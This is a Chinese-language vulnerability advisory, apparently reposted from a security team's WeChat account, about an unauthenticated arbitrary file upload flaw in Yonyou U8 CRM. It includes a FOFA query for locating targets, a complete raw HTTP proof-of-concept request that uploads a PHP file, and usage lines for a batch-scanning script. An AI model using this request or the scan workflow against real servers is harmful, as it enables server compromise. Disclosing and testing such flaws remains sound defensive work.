免责声明:本文仅用于技术学习和讨论。请勿使用本文所提供的内容及相关技术从事非法活动,若利用本文提供的内容或工具造成任何直接或间接的后果及损失,均由使用者本人负责,所产生的一切不良后果均与文章作者及本账号无关。
fofa
title="用友U8CRM"
一、漏洞简述
用友CRM系统客户关系管理的第一需求就是对客户资源的集中管理,即为客户资源的企业化管理,可以避免因业务调整或人员变动造成的客户资源流失和客户管理盲区的产生;更重要是可以基于客户状况来归集相关业务信息,通过完善的信息来支持业务角色的工作,同时达到对业务阶段和行动的监控指导。这也是CRM对企业带来的核心变化。其接口uploadfile.php存在任意文件上传漏洞,攻击者课通过该漏洞获取系统服务器权限。
二、漏洞检测poc
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Type: multipart/form-data;boundary=----230982304982309
Content-Length: 278
------230982304982309
Content-Disposition: form-data; name="file"; filename="test.php "
Content-Type: application/octet-stream
echo "HelloWorldTest";unlink(__FILE__);
------230982304982309
Content-Disposition: form-data; name="upload"
upload
------230982304982309--
返回的路径
三、漏洞检测脚本
安全测试人员可通过该脚本进行探测自身服务是否存在此漏洞:
https://github.com/ATonysan/poc-exp/blob/main/YongyouU8CRM_uploadfile_ArbitraryFileUploads.py
批量检测:
python YongyouU8CRM_uploadfile_ArbitraryFileUploads.py -f url.txt
单个url检测漏洞:
python YongyouU8CRM_uploadfile_ArbitraryFileUploads.py -u url
四、修复
官方已更新补丁,请升级至最新版本。
官网地址:http://shbnk.cn/Home/products/id/460
原文始发于微信公众号(苏诺木安全团队):【1day】用友U8 CRM uploadfile 任意文件上传漏洞【附poc】
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论